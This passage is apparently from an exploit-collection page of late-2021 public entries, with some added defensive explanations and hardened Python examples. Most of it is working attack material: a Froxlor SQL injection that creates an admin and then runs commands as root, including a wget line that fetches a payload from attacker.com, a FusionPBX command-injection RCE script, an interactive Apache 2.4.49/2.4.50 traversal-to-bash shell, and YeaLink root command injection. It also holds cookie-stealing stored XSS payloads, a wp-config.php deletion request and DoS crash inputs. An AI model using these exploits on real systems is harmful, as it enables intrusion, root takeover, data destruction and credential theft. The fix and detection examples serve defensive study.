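    fields = parse_qs(body)
    return fields["username"][0], fields["password"][0]


def login_vulnerable(con, username, password):
    """The pattern behind both advisories: submitted strings become SQL text.
    With the PoC input the WHERE clause reads
        username = 'admin' or '1'='1' AND password = 'admin' or '1'='1'
    and the trailing OR is true for every row, so a row always comes back."""
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return con.execute(sql).fetchone() is not None


def login_fixed(con, username, password):
    """Parameterised query: the driver passes the values as data, so the quotes
    and OR in the payload are compared literally against the stored columns."""
    row = con.execute("SELECT id FROM users WHERE username = ? AND password = ?",
                      (username, password)).fetchone()
    return row is not None


if __name__ == "__main__":
    con = make_db()
    user, pw = creds_from_body(POC_BODY)
    print("decoded username field:", user)
    print("string-built handler accepts PoC:", login_vulnerable(con, user, pw))
    print("parameterised handler accepts PoC:", login_fixed(con, user, pw))
```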
-
Froxlor 0.10.29.1 - SQL Injection (Authenticated)
# Exploit Title: Froxlor 0.10.29.1 - SQL Injection (Authenticated)
# Exploit Author: Martin Cernac
# Date: 2021-11-05
# Vendor: Froxlor (https://froxlor.org/)
# Software Link: https://froxlor.org/download.php
# Affected Version: 0.10.28, 0.10.29, 0.10.29.1
# Patched Version: 0.10.30
# Category: Web Application
# Tested on: Ubuntu
# CVE: 2021-42325

# 1. Technical Description:
#
# Froxlor 0.10.28 and 0.10.29.x are affected by an SQL injection from the authenticated customer panel. This allows an attacker to escalate privileges by creating a Froxlor administrator account and using it to get remote code execution as root on the target machine.
#
# 1.1 Pre-requisites
# - Access to a customer account
# - Ability to specify the database name when creating a database
# - Feature only available from 0.10.28 onward and must be manually enabled

# 2. Proof Of Concept (PoC):
#
# The following is a walkthrough of privilege escalation from a mere customer to an admin and achieving RCE as root
#
# 2.1 Privilege Escalation
#
# - Sign into Froxlor as a customer
# - View your databases
# - Create a database
# - Put your payload into the "User/Database name" field (if enabled)
# - The application will error out; however, your SQL query will be executed
#
# The following is a POST request example of running the payload provided, resulting in an administrator account being created

---
POST /froxlor/customer_mysql.php?s=fdbdf63173d0b332ce13a148476499b2 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 448

s=fdbdf63173d0b332ce13a148476499b2&page=mysqls&action=add&send=send&custom_suffix=%60%3Binsert+into+panel_admins+%28loginname%2Cpassword%2Ccustomers_see_all%2Cdomains_see_all%2Ccaneditphpsettings%2Cchange_serversettings%29+values+%28%27x%27%2C%27%245%24ccd0bcdd9ab970b1%24Hx%2Fa0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8%27%2C1%2C1%2C1%2C1%29%3B--&description=x&mysql_password=asdasdasdasdasdasdwire&mysql_password_suggestion=oyxtjaihgb&sendinfomail=0
---

#
# 2.2 Remote Code Execution
#
# To achieve RCE as root:
#
# - Sign into Froxlor as the newly created admin account (payload example creds are x:a)
# - Go to System Settings
# - Go to Webserver settings
# - Adjust the "Webserver reload command" field to a custom command
#   - The command must not contain any of the following special characters: ;|&><`$~?
#   - For details, see the "safe_exec" function in lib/Froxlor/FileDir.php
#   - For example commands see the Payloads 4.2 section
# - Trigger configuration file rebuild
#   - Use menu item "Rebuild config files"
# - Await a root cron job to execute your command

# 3. Vulnerable resources and parameters
# /customer_mysql.php (POST field: custom_suffix)

# 4. Payloads
#
# 4.1 SQL Injection payload
# The following payload creates a new Froxlor admin with full access to all customers and the server configuration
# The credentials are:
# - username: x
# - password: a
#
# `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);--
#
# 4.2 Remote Code Execution payload
# Two part payload:
# - wget http://attacker.com/malicious.txt -O /runme.php
# - php /runme.php

# 5. Timeline
# 2021-10-11 Discovery
# 2021-10-11 Contact with developer
# 2021-10-11 Patch issued but no release rolled out
# 2021-10-12 Reserved CVE-2021-42325
# 2021-11-05 Fix release rolled out
# 2021-11-07 Public disclosure

# 6. References:
# https://github.com/Froxlor/Froxlor/releases/tag/0.10.30
-
WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion
# Exploit Title: WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion
# Date: 11/07/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/
# Version: 1.0.3
# Tested on : Windows 10

#Poc:

----------------------------------REQUEST---------------------------------------
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 155
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce
----------------------------------------------------------------------------------

-------------------------------RESPONSE-------------------------------------------
HTTP/1.1 200 OK
Date: Sun, 07 Nov 2021 13:19:38 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
X-Powered-By: PHP/8.0.7
Access-Control-Allow-Origin: http://localhost
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 9
Connection: close
Content-Type: application/json; charset=UTF-8

"success"
----------------------------------------------------------------------------------
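The request above hands the plugin both the directory (folder_name, the site root) and the file (file_name, wp-config.php), and the plugin unlinks their concatenation. The check that is missing is path containment: the resolved target must stay inside the backup directory and be a backup archive. The following is an added example written for this page, not the plugin's code; the backup root, the .zip-only rule and POSIX paths in the comments are assumptions:

```python
import os

# Assumption: backups live under a single directory and only archives with
# these extensions are legitimate deletion targets.
ALLOWED_EXTENSIONS = (".zip",)

def vulnerable_target(folder_name, file_name):
    """What the advisory's request implies: the two parameters are joined as
    received and the result is unlinked, so any file the web server user can
    delete (here wp-config.php) is reachable."""
    return folder_name + file_name

def resolve_backup_target(backup_root, folder_name, file_name):
    """Return the absolute path to delete, or raise ValueError.
    Hardened version constructed for this page."""
    if file_name != os.path.basename(file_name) or file_name in ("", ".", ".."):
        raise ValueError("file_name must be a bare file name")
    if not file_name.lower().endswith(ALLOWED_EXTENSIONS):
        raise ValueError("not a backup archive")
    root = os.path.realpath(backup_root)
    # os.path.join discards root when folder_name is absolute, and realpath
    # collapses any '..'; the commonpath check then catches both escapes.
    target = os.path.realpath(os.path.join(root, folder_name, file_name))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes the backup directory")
    return target

def is_safe_delete(backup_root, folder_name, file_name):
    try:
        resolve_backup_target(backup_root, folder_name, file_name)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    root = "/var/www/html/wp-content/uploads/backups"   # assumed location
    print("vulnerable:", vulnerable_target("/var/www/html/wordpress/", "wp-config.php"))
    for folder, name in [("/var/www/html/wordpress/", "wp-config.php"),
                         ("../../../", "backup.zip"),
                         ("site1", "backup-2021-11-07.zip")]:
        print(f"{folder!r} + {name!r}: allowed={is_safe_delete(root, folder, name)}")
```

Checking the nonce (the request carries one) does not help here: the caller is an authenticated admin, and the bug is that the deletion routine trusts client-supplied paths at all.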
-
zlog 1.2.15 - Buffer Overflow
# Exploit Title: zlog 1.2.15 - Buffer Overflow
# Date: 10/23/2021
# Exploit Author: LIWEI
# Vendor Homepage: https://github.com/HardySimpson/zlog
# Software Link: https://github.com/HardySimpson/zlog
# Version: v1.2.15
# Tested on: ubuntu 18.04.2

# 1.- Compile the zlog v1.2.15 code into a library.
# 2.- Use the "zlog_init" API to parse a file. You can do it as in my test case below.
# 3.- Crash: it performs a stack-buffer-overflow READ.
# 4.- You can also get a stack-buffer-overflow WRITE when the address reached by the overflowing read ends with "0x20".
# 5.- Here is the crash backtrace:

#0 0x5588c3 in zlog_conf_build_with_file /src/zlog/src/conf.c:308:15
#1 0x557ad6 in zlog_conf_new /src/zlog/src/conf.c:176:7
#2 0x551183 in zlog_init_inner /src/zlog/src/zlog.c:91:18
#3 0x551008 in zlog_init /src/zlog/src/zlog.c:134:6
#4 0x550df1 in LLVMFuzzerTestOneInput /src/zlog_init_fuzzer.c:18:18

And also my test case:

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>   /* getpid, unlink */
#include "zlog.h"

/* libFuzzer entry point: write the fuzz input to a temporary file and hand it
 * to zlog_init(), which parses it as a zlog configuration file. */
int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size)
{
    char filename[256];
    snprintf(filename, sizeof(filename), "/tmp/libfuzzer.%d", getpid());

    FILE *fp = fopen(filename, "wb");
    if (!fp) return 0;
    fwrite(data, size, 1, fp);
    fclose(fp);

    int rc = zlog_init(filename);   /* crashes inside zlog_conf_build_with_file (conf.c:308) */
    if (rc == 0) {
        zlog_fini();
    }

    unlink(filename);
    remove(filename);
    return 0;
}

Put my test case in the project and change the compile line to:

CC="clang" CFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link" \
CXX="clang++" CXXFLAGS="-O1 -fno-omit-frame-pointer -gline-tables-only -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link -stdlib=libc++"

Use ./configure under the project as shown in its README.txt. You will get a binary named after the test case; run it and you will reproduce the crash.
-
FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)
# Exploit Title: FusionPBX 4.5.29 - Remote Code Execution (RCE) (Authenticated)
# Date: 11/08/2021
# Exploit Author: Luska
# Vendor Homepage: https://www.fusionpbx.com/
# Software Link: https://github.com/fusionpbx/fusionpbx
# Version: < 4.5.30
# Tested on: Debian
# CVE : CVE-2021-43405

#!/usr/bin/python3
import argparse

import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder

cookies = {'PHPSESSID': '31337'}
# Exploit traffic is sent through a local intercepting proxy (e.g. Burp) for
# inspection; set to None if nothing is listening on 8080.
proxy = {'http': 'http://127.0.0.1:8080'}


def login(url, username, password):
    data = {
        'username': username,
        'password': password
    }
    r = requests.post(url + '/core/user_settings/user_dashboard.php', data=data, cookies=cookies)
    return r.status_code


def exploit_request(url, cmd):
    print('[+] Sending Exploit Request')
    # fax_extension reaches a shell unescaped: ';' ends the original command,
    # '#' comments out whatever follows our command.
    mp_encoder = MultipartEncoder(fields={
        'fax_subject': '1337',
        'fax_extension': f';{cmd} #',
        'action': 'send',
        'submit': 'send'
    })
    r = requests.post(url + '/app/fax/fax_send.php', cookies=cookies,
                      headers={'Content-Type': mp_encoder.content_type},
                      data=mp_encoder, proxies=proxy)
    return r.status_code


def exploit(url, username, password, cmd):
    if login(url, username, password) == 200:
        print('[+] Login Successful')
        exploit_request(url, cmd)
        print('[+] Exploit Successful')
    else:
        print('[-] Login Failed')


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='[*] FusionPBX < 4.5.30 Remote Code Execution | CVE-2021-43405')
    parser.add_argument('-t', metavar='<target/host URL>', help='Target/host URL, example: http://127.0.0.1', required=True)
    parser.add_argument('-u', metavar='<user>', help='User to login', required=True)
    parser.add_argument('-p', metavar='<password>', help='User\'s password', required=True)
    parser.add_argument('-c', metavar='<cmd>', help='Command to be executed', required=True)
    args = parser.parse_args()

    target = args.t
    user = args.u
    password = args.p
    cmd = args.c

    exploit(target, user, password, cmd)
-
Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)
# Exploit Title: Employee Daily Task Management System 1.0 - 'Name' Stored Cross-Site Scripting (XSS)
# Date: 09/11/2021
# Exploit Author: Ragavender A G
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/edtms.zip
# Version: v1.0
# Tested on: Windows 10

Exploit:
1. Navigate to the URL http://localhost/edtms/edtms/admin/?page=maintenance
2. Add a new department with the following value:
   - Name: <svg/onload=alert(1)>
3. Save the department and refresh the page, which should trigger the payload.

PoC:

POST /edtms/edtms/Actions.php?a=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 49
Origin: http://localhost
Connection: close
Referer: http://localhost/edtms/edtms/admin/?page=maintenance
Cookie: PHPSESSID=bmh8mhmk3r0rksta56msbl7dn3

id=&name=%3Csvg%2Fonload%3Dalert(100)%3E&status=1
-
Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
# Exploit Title: Employee and Visitor Gate Pass Logging System 1.0 - 'name' Stored Cross-Site Scripting (XSS)
# Date: 10.11.2021
# Exploit Author: İlhami Selamet
# Vendor Homepage: https://www.sourcecodester.com/php/15026/employee-and-visitor-gate-pass-logging-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15026&title=Employee+and+Visitor+Gate+Pass+Logging+System+in+PHP+with+Source+Code
# Version: v1.0
# Tested on: Kali Linux + XAMPP v8.0.12

Employee and Visitor Gate Pass Logging System PHP 1.0 suffers from a stored Cross Site Scripting (XSS) vulnerability.

Step 1 - Log in with the admin account and navigate to the 'Department List' tab:
         http://localhost/employee_gatepass/admin/?page=maintenance/department
Step 2 - Click on the 'Create New' button to add a new department.
Step 3 - Fill out all required fields to create a new department. Put the payload in the department 'name' field:
         <script>alert(document.cookie)</script>
Step 4 - Save the department. The stored XSS triggers for every user who navigates to the 'Department List' page.

PoC

POST /employee_gatepass/classes/Master.php?f=save_department HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------407760789114464123714007564888
Content-Length: 555
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_gatepass/admin/?page=maintenance/department
Cookie: PHPSESSID=8d0l6t3pq47irgnbipjjesrv54

-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="id"


-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="name"

<script>alert(document.cookie);</script>
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="description"

desc
-----------------------------407760789114464123714007564888
Content-Disposition: form-data; name="status"

1
-----------------------------407760789114464123714007564888--
-
YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
# Exploit Title: YeaLink SIP-TXXXP 53.84.0.15 - 'cmd' Command Injection (Authenticated)
# Date: 11-10-2021
# Exploit Author: tahaafarooq
# Vendor Homepage: https://www.yealink.com/
# Version: 53.84.0.15
# Tested on: YeaLink IP Phone SIP-T19P (hardware VoIP phone)

Description:
The Diagnostics tool on the Network tab runs a Ping or Traceroute against a user-supplied target. The "cmd" parameter is handed to the OS shell without sanitisation, so shell metacharacters in it inject arbitrary commands, which run as root.

POC:

POST /servlet?m=mod_data&p=network-diagnosis&q=docmd&Rajax=0.890925468511929 HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 49
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx/servlet?m=mod_data&p=network-diagnosis&q=load
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=9a83d24461329a130
Connection: close

cmd=; id;&token=1714636915c6acea98

-------------------------------------------------

HTTP/1.1 200 OK
Content-Type: text/html
Connection: close
Date: Wed, 10 Nov 2021 14:20:23 GMT
Server: embed httpd
Content-Length: 82

<html>
<body>
<div id="_RES_INFO_">
uid=0(root) gid=0(root)
</div>
</body>
</html>
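This advisory and the FusionPBX one above share a shape: a form field (the phone's "cmd" target, FusionPBX's "fax_extension") is spliced into a shell command line, so "; id;" or ";id #" becomes a second command. The following is an added example, not code from either product (their real command templates are not on the page, so the template is assumed). It tokenises the injected line the way /bin/sh would, to show how many commands actually run, and then shows the fix: validate the value as a host and pass it as an argv element with no shell at all.

```python
import ipaddress
import re
import shlex
import subprocess

# Constructed model of the vulnerable shape: user input spliced into a shell string.
def vulnerable_command_line(template, value):
    return template.replace("{}", value)

def shell_commands_in(cmdline):
    """Tokenise like /bin/sh and split on ';' to list the commands that run.
    '#' starts a comment, which is what the FusionPBX payload relies on."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    cmds, cur = [], []
    for tok in lexer:
        if tok == ";":
            if cur:
                cmds.append(cur)
            cur = []
        else:
            cur.append(tok)
    if cur:
        cmds.append(cur)
    return cmds

# RFC 1123-style hostname: labels of letters, digits and hyphens, 253 chars max.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$",
    re.IGNORECASE)

def is_valid_host(value):
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.match(value) is not None

def safe_ping_argv(target):
    """Hardened form: validate, then build an argv list for execution without a
    shell, so no metacharacter is ever interpreted."""
    if not is_valid_host(target):
        raise ValueError("invalid ping target")
    return ["ping", "-c", "4", target]

def run_ping(target, timeout=15):
    # shell=False is the default for a list argv; the target is one argument.
    return subprocess.run(safe_ping_argv(target), capture_output=True,
                          text=True, timeout=timeout).stdout

if __name__ == "__main__":
    for value in ["192.0.2.1", "; id;", ";id #"]:
        line = vulnerable_command_line("ping -c 4 {}", value)
        print(f"{line!r} -> runs {shell_commands_in(line)}")
        print(f"  accepted by validator: {is_valid_host(value)}")
```

The validator deliberately accepts only IP literals and hostnames rather than trying to strip "bad" characters: a blacklist is what the phone's firmware evidently lacks, and blacklists of shell metacharacters are routinely incomplete.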
-
AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
# Exploit Title: AbsoluteTelnet 11.24 - 'Username' Denial of Service (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-10
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
# Tested Version: 11.24
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: AbsoluteTelnet 11.24 - 'SHA1/SHA2/Username' and 'Error Report' Denial of Service (PoC)

# Steps to reproduce:
# 1. - Download and install AbsoluteTelnet
# 2. - Run the python script; it creates the exploit.txt file.
# 3. - Open AbsoluteTelnet 11.24
# 4. - "New connection file -> Connection -> SSH1 & SSH2"
# 5. - Paste the characters from the txt file into "Authentication -> Username"
# 6. - Press the "OK" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.24
# 9. - Copy the same characters into "Your Email Address (optional)"
# 10.- Click the "Send Error Report" button
# 11.- Crashed

#!/usr/bin/python
exploit = 'A' * 1000

try:
    file = open("exploit.txt", "w")
    file.write(exploit)
    file.close()
    print("POC is created")
except:
    print("POC not created")
-
AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
# Exploit Title: AbsoluteTelnet 11.24 - 'Phone' Denial of Service (PoC)
# Discovered by: Yehia Elghaly
# Discovered Date: 2021-11-10
# Vendor Homepage: https://www.celestialsoftware.net/
# Software Link: https://www.celestialsoftware.net/telnet/AbsoluteTelnet32.11.24.exe
# Tested Version: 11.24
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional x86 SP1 - Windows 10 x64
# Description: AbsoluteTelnet 11.24 - 'DialUp/Phone' & license name Denial of Service (PoC)

# Steps to reproduce:
# 1. - Download and install AbsoluteTelnet
# 2. - Run the python script; it creates the exploit.txt file.
# 3. - Open AbsoluteTelnet 11.24
# 4. - "New connection file -> DialUp Connection"
# 5. - Paste the characters from the txt file into "DialUp -> phone"
# 6. - Press the "OK" button
# 7. - Crashed
# 8. - Reopen AbsoluteTelnet 11.24
# 9. - Copy the same characters into "license name"
# 10.- Click the "Send Error Report" button
# 11.- Crashed

#!/usr/bin/python
exploit = 'A' * 1000

try:
    file = open("exploit.txt", "w")
    file.write(exploit)
    file.close()
    print("POC is created")
except:
    print("POC not created")
-
Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)
# Date: 11/11/2021
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://apache.org/
# Version: Apache 2.4.49/2.4.50 (CGI enabled)
# Tested on: Debian GNU/Linux
# CVE : CVE-2021-41773 / CVE-2021-42013
# Credits : Lucas Schnell

#!/usr/bin/env python3
#coding: utf-8

import os
import sys
import time
import requests
from colorama import Fore, Style

header = '''\033[1;91m
▄▄▄ ██▓███ ▄▄▄ ▄████▄ ██░ ██ ▓█████ ██▀███ ▄████▄ ▓█████
▒████▄ ▓██░ ██▒▒████▄ ▒██▀ ▀█ ▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ▓█ ▀
▒██ ▀█▄ ▓██░ ██▓▒▒██ ▀█▄ ▒▓█ ▄ ▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▒███
░██▄▄▄▄██ ▒██▄█▓▒ ▒░██▄▄▄▄██ ▒▓▓▄ ▄██▒░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▒▓█ ▄
▓█ ▓██▒▒██▒ ░ ░ ▓█ ▓██▒▒ ▓███▀ ░░▓█▒░██▓░▒████▒ ░██▓ ▒██▒▒ ▓███▀ ░░▒████▒
▒▒ ▓▒█░▒▓▒░ ░ ░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░ ░ ▒▓ ░▒▓░░ ░▒ ▒ ░░░ ▒░ ░
▒ ▒▒ ░░▒ ░ ▒ ▒▒ ░ ░ ▒ ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░ ░ ░
░ ▒ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░
''' + Style.RESET_ALL

if len(sys.argv) < 2:
    print('Use: python3 file.py ip:port')
    sys.exit()


def end():
    print("\t\033[1;91m[!] Bye bye !")
    time.sleep(0.5)
    sys.exit(1)


def commands(url, command, session):
    directory = mute_command(url, 'pwd')
    user = mute_command(url, 'whoami')
    hostname = mute_command(url, 'hostname')
    print(Fore.YELLOW + 'Reverse shell is advised (This isn\'t an interactive shell)')
    command = input(f"{Fore.RED}╭─{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\n{Fore.RED}╰─{Fore.YELLOW}$ {Style.RESET_ALL}")
    # The command is sent as the POST body; /bin/bash reached through the
    # traversal reads it from stdin, hence the leading "echo;".
    command = f"echo; {command};"
    req = requests.Request('POST', url=url, data=command)
    prepare = req.prepare()
    # Re-assign the URL after prepare() so requests does not normalise the
    # encoded traversal sequences out of the path.
    prepare.url = url
    response = session.send(prepare, timeout=5)
    output = response.text
    print(output)
    if 'clear' in command:
        os.system('/usr/bin/clear')
        print(header)
    if 'exit' in command:
        end()


def mute_command(url, command):
    session = requests.Session()
    req = requests.Request('POST', url=url, data=f"echo; {command}")
    prepare = req.prepare()
    prepare.url = url
    response = session.send(prepare, timeout=5)
    return response.text.strip()


def exploitRCE(payload):
    try:
        host = sys.argv[1]
        if 'http' not in host:
            url = 'http://' + host + payload
        else:
            url = host + payload
        session = requests.Session()
        command = "echo; id"
        req = requests.Request('POST', url=url, data=command)
        prepare = req.prepare()
        prepare.url = url
        response = session.send(prepare, timeout=5)
        output = response.text
        if "uid" in output:
            print(Fore.GREEN + '\n[!] Target %s is vulnerable !!!' % host)
            print("[!] Output:\n\n" + Fore.YELLOW + output)
            choice = input(Fore.CYAN + "[?] Do you want to exploit this RCE ? (Y/n) : ")
            if choice.lower() in ['', 'y', 'yes']:
                while True:
                    commands(url, command, session)
            else:
                end()
        else:
            print(Fore.RED + '\nTarget %s isn\'t vulnerable' % host)
    except KeyboardInterrupt:
        end()


def main():
    try:
        # CVE-2021-41773 (2.4.49): path normalisation does not decode %2e before
        # the ".." check, so a single layer of encoding walks out of /cgi-bin/.
        apache2449_payload = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
        # CVE-2021-42013 (2.4.50): the fix handles one layer only, so a doubly
        # encoded dot (%%32%65 -> %2e -> .) still gets through.
        apache2450_payload = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
        payloads = [apache2449_payload, apache2450_payload]
        choice = len(payloads) + 1
        print(header)
        print("\033[1;37m[0] Apache 2.4.49 RCE\n[1] Apache 2.4.50 RCE")
        while choice >= len(payloads) and choice >= 0:
            choice = int(input('[~] Choice : '))
            if choice < len(payloads):
                exploitRCE(payloads[choice])
    except KeyboardInterrupt:
        print("\n\033[1;91m[!] Bye bye !")
        time.sleep(0.5)
        sys.exit(1)


if __name__ == '__main__':
    main()
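The two payloads differ only in how many layers of percent-encoding hide the ".." segments, which is exactly what a detection rule has to account for. The following is an added example, not part of the exploit above: it decodes a request path pass by pass, reports the pass at which a traversal first appears, shows where the path resolves, and runs that check over a few constructed access-log lines (the log lines are made up for this page; the two exploit paths are the script's own).

```python
import posixpath
import re
from urllib.parse import unquote

# The two request paths used by the script above.
APACHE_2449 = '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash'
APACHE_2450 = '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'

def decode_passes(path, max_passes=3):
    """Percent-decode repeatedly, recording each pass, until a pass changes nothing."""
    passes, cur = [], path
    for _ in range(max_passes):
        nxt = unquote(cur)
        if nxt == cur:
            break
        passes.append(nxt)
        cur = nxt
    return passes

def traversal_pass(path):
    """0 if no decoding pass yields a '..' segment; otherwise the 1-based pass
    at which it first appears (1 = single-encoded, the 2.4.49 payload;
    2 = double-encoded, the 2.4.50 payload). The query string is ignored."""
    for n, decoded in enumerate(decode_passes(path), start=1):
        if ".." in decoded.split("?", 1)[0].split("/"):
            return n
    return 0

def resolved_path(path):
    """Where the fully decoded path lands once '..' segments are collapsed."""
    passes = decode_passes(path)
    return posixpath.normpath(passes[-1] if passes else path)

# Constructed Apache access-log lines (not from the advisory) to run the check over.
SAMPLE_LOG = [
    '198.51.100.7 - - [11/Nov/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024',
    '198.51.100.7 - - [11/Nov/2021:10:00:02 +0000] "POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash HTTP/1.1" 200 41',
    '198.51.100.7 - - [11/Nov/2021:10:00:03 +0000] "POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash HTTP/1.1" 200 41',
    '203.0.113.9 - - [11/Nov/2021:10:00:04 +0000] "GET /search?q=%2e%2e HTTP/1.1" 200 512',
]
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def flag_traversal(lines):
    """Return (path, pass_number) for each request whose path hides '..'
    behind one or more layers of encoding."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if m:
            n = traversal_pass(m.group(1))
            if n:
                hits.append((m.group(1), n))
    return hits

if __name__ == "__main__":
    for p in (APACHE_2449, APACHE_2450):
        print(f"{p}\n  passes: {decode_passes(p)}\n  traversal at pass {traversal_pass(p)}, resolves to {resolved_path(p)}")
    for path, n in flag_traversal(SAMPLE_LOG):
        print(f"flagged (pass {n}): {path}")
```

A rule that decodes once catches the 2.4.49 payload and misses the 2.4.50 one, which is the same mistake the 2.4.50 fix made; decoding until the path stops changing closes that gap.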
-
